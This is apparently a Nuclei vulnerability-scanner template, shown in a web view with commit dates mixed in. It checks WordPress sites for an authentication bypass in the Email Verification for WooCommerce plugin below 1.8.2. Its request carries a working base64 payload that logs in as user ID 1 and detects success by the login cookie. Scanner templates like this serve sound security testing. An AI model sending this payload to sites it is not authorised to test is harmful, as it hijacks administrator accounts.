nuclei-templates/vulnerabilities/wordpress/wp-woocommerce-email-verifi...

30 lines
838 B
YAML
Raw Normal View History

id: wp-woocommerce-email-verification
info:
name: wordpress-emails-verification-for-woocommerce
2021-06-09 12:20:56 +00:00
author: random_robbie
severity: critical
2021-02-16 17:02:57 +00:00
tags: wordpress,wp-plugin
2021-04-18 13:11:30 +00:00
description: Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass
reference: https://wpvulndb.com/vulnerabilities/10318
# GDPR plugin may give a false positive so double check headers
requests:
- method: GET
path:
- "{{BaseURL}}/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0="
- "{{BaseURL}}/blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0="
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "wordpress_logged_in"
2021-01-11 06:44:22 +00:00
part: header
- type: status
status:
- 401
- 403
negative: true